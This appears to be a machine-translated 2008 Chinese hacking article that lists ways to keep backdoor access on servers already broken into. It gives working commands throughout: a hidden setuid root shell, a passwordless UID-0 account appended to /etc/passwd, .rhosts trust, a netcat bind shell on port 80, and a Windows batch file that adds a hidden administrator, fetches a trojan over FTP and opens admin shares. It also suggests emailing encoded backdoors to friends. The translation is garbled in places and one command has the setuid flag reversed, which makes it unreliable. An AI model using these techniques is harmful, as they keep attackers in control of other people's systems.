Common left the back door approach-vulnerability warning-the black bar safety net

ID MYHACK58:62200818686
Type myhack58
Reporter 佚名
Modified 2008-04-02T00:00:00


For us such a dish hand, finally got the servers is not easy, if it is found it miserable. In fact, the open back door methods there are many, below I to talk, I've learned of several ways.

1. Setuid

cp /bin/sh /tmp/. root

chmod u-s /tmp/. root

Add suid bit to the shell on, although very simple, but can easily be found.

2. Echo "hack::0:0::/:/bin/csh" >> /etc/passwd

That is, to the system to increase A The ID is 0 for root)account, no password, but the administrator with the find command you can find.

  1. Echo "hack">>/. rhosts

If this system opened a 5 1 2 and 5 1 3 port, you can. The one called hack Add to. rhosts file, rlogin login without password.

  1. Modify the Sendmail. cf file

Add a"wiz" command, and then telnet 2 5 After the wiz, which you can.

5. Rootkit virus

These things now is pretty fiery stuff, but be careful of the file after the applicability date, etc. some of the small details. Some need to compile it yourself, or compiled.

  1. Remote shell

Sunx that the backdoor is very good, does not produce a journal file to prevent the who and so on. Need to compile, but running on redhat 6.1 is very good. But in 7. 1 and other versions as if it is a little bug.

Or you can bindshell, you can replace inetd. conf is not commonly used service, the note file modification time.

7. Http Backdoor

In fact, the General of the firewall to the Web service limit less of it, so we can from here to start, here need to use port redirection. Simple that is web open http service 2, The A is http itself, one is the remote shell bindshell on. The firewall filter every other port, prohibiting reverse connection, simple is can be used in nc. (netcat this put cmd. exe is bound to the 8 0 port up. telnet 8 0 and then you get a shell. Or you can use asp,php. cgi and other code written in the back door, also can be used to the same effect.

  1. Bat the back door(original)

If it is a xnix server, no way.

Ms Server:

backdoor. bat

net user hacker windychild /add

net localgroup administrators hacker /add create the super admin user

echo open>c:\ftp.txt

echo xxx>>c:\ftp.txt

echo xxxxxx>>c:\ftp.txt

echo get srv. exe>>c:\ftp.txt

echo bye>>c:\ftp.txt


copy srv.exe c:\winnt\


del c:\ftp.txt

del c:\srv.exe ...... Can set up their own Trojan horse or back door, etc.

.... Or you can write on open 3 3 8 9 service, the telnet statement

The other, open to share!

net share ipc=ipc$

net share hdc=c$


If the hard point, then, simply give it the last rootkit for win.

  1. You can use the mail encoding vulnerability

Set yourself a base64-encoded files to your friends, and then put the back door. exe convert message encoding.

In fact, the above methods are very common methods. There are a lot of ways, and sometimes can't sort it out, but for the uninitiated enough!